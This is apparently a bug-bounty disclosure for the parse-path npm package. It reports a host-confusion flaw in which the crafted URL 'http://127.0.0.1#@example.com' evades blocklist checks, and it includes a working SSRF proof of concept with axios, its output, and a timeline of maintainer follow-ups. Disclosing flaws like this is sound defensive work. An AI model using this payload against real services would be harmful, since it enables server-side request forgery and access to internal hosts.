Authorization Bypass Through User-Controlled Key in ionicabizau/parse-path
Valid
Reported on
Feb 14th 2022
Description
parse-path is unable to detect the right resource. While parsing http://127.0.0.1#@example.com url, parse-path thinks that the host/resource is example.com, however the actual resource is 127.0.0.1.
Proof of Concept
SSRF PoC
const parsePath = require("parse-path");
const axios = require('axios');
var PAYLOAD = "http://127.0.0.1#@example.com";
parsedData = parsePath(PAYLOAD);
// Blacklist few domains
if (parsedData.resource !== '127.0.0.1') {
console.log("BYPASSED...");
axios.get(PAYLOAD).then(function (resp) {
console.log("Sent the request to " + resp.request._currentUrl);
})
.catch(function (error) {
console.log("Sent the request to " + error.request._currentUrl);
});
}
OUTPUT:
BYPASSED...
Sent the request to http://127.0.0.1/
Impact
An attacker can bypass the host-validation checks which can lead to SSRF, open redirect and other similar vulnerabilities. The above PoC bypass SSRF checks as axios will load 127.0.0.1 rather than example.com
Occurrences
We are processing your report and will contact the
ionicabizau/parse-path
team within 24 hours.
2 years ago
We have contacted a member of the
ionicabizau/parse-path
team and are waiting to hear back
2 years ago
We have sent a
fix follow up to the
ionicabizau/parse-path
team.
We will try again in 7 days.
2 years ago
We have sent a
second
fix follow up to the
ionicabizau/parse-path
team.
We will try again in 10 days.
2 years ago
We have sent a
third and final
fix follow up to the
ionicabizau/parse-path
team.
This report is now considered stale.
2 years ago
index.js#L27-L133
has been validated
to join this conversation